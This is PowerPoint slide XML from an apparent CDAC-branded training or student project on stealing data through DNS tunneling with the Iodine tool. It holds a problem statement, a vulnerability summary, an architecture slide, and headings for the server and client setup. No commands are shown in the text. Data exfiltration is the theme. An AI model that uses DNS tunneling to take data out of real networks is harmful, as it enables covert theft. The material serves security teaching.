              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000"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id="{5F3BC6ED-2FE8-E3B7-7DB4-AA4E56183C80}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5EF2A3C-F940-0AA2-142A-4DBC8FF124B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171564" y="1389105"/>
            <a:ext cx="7848872" cy="4807685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184657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B9580D-CB86-4E6E-C846-7471B4317B1F}"/>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1026" name="Picture 2" descr="What is DNS tunneling, and how can it be prevented? - Quora">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7BE41CD-FE6A-2EDE-5BD0-FB2E7F9C43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17" t="2127" r="21117" b="2127"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3575720" y="799142"/>
            <a:ext cx="5040560" cy="5259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00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B290693-17F5-8E0A-A6CE-1EE8B7E959C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright © 2024                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed and Developed by CDAC </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80AF180D-44E3-59DB-CB62-CCA038100B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071664" y="2828835"/>
            <a:ext cx="6434493" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="1" cap="none" spc="0" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157829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97A061-BE1C-2CE1-DA2F-22BF0E1E6F26}"/>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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5581A01F-20CD-A325-6638-7DF281FF8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858" y="2780996"/>
            <a:ext cx="5076461" cy="3384307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0035FF79-14E1-9596-C060-12095B6D15F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767326" y="3136612"/>
            <a:ext cx="4608512" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Domain Name System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB7A404-7B5E-8042-19E4-882D76A2F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735278" y="1613956"/>
            <a:ext cx="7953010" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Problem Statement:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Data Stealing using DNS tunnelling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Information Stealing through Domain Name.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="20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723A1666-97B3-0ACE-B373-A75C17E8D45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4628681" y="844515"/>
            <a:ext cx="2934638" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Introduction</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2474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E7BEE6-F63B-CBE8-B7AA-1693A66F4587}"/>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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F1392D0-35BC-9D4A-5C38-F2A76A410DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5262489" y="1628800"/>
            <a:ext cx="6552728" cy="3284555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C5E448-FB26-1BFC-6C82-3B9028640A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7248128" y="4403675"/>
            <a:ext cx="3168352" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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E3713E0B-53CA-E88C-ADF7-A709DBECC0AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376783" y="1351508"/>
            <a:ext cx="4680521" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Key Details:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Vulnerability Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> DNS Tunneling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Severity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> High (CVSS v3.1 score: 7.5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Attack Vector:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Complexity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Privileges Required:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>User Interaction:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> High on Confidentiality,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>                Integrity, and Availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248852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2827-CE8F-A674-3B6E-D9A145DD7000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="947860"/>
            <a:ext cx="10972800" cy="680940"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD7CC0F-5B0F-00AC-EAFC-8FE932F83AD0}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC414300-49DE-5E1D-41EB-390E770801D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3561" t="8164" r="5457" b="7096"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="970512" y="1916832"/>
            <a:ext cx="10250975" cy="3993308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673777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649214-0C66-C77D-556B-36393B2DA0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright © 2024                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed and Developed by CDAC </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1A46DCC-C5A8-62FE-C2A5-27911CAD3239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839415" y="871319"/>
            <a:ext cx="10513168" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Performing Data Stealing Using DNS Tunneling with Iodine</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDA9901-8E05-C5A4-A14F-E0F412C1501D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="12583" r="50322" b="9445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2351584" y="2456892"/>
            <a:ext cx="7168090" cy="3672408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C35BD9-CEE7-1F58-AAFC-C70283D34945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7248128" y="4437112"/>
            <a:ext cx="778272" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 117583"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388343BA-6750-1FA7-0156-CE6DE6948E48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586096" y="1756438"/>
            <a:ext cx="6111240" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. Setting Up the Iodine Server (Server side)  </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232530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A170893-5FA7-EBA1-35D6-5D062B4A6AD8}"/>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3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BC4DD2-2BF9-82F9-DD25-61E3913FF566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="49982" t="7074"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2351584" y="1860354"/>
            <a:ext cx="7096327" cy="4176464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79FC9C84-E111-1F6B-0EC1-7009C645367B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315696" y="3933056"/>
            <a:ext cx="710704" cy="200494"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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906B3672-2A5A-44F3-A25C-827F2A3732B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267566" y="1140712"/>
            <a:ext cx="6112042" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" kern="100" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. Setting Up the Iodine Client (Client Side)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
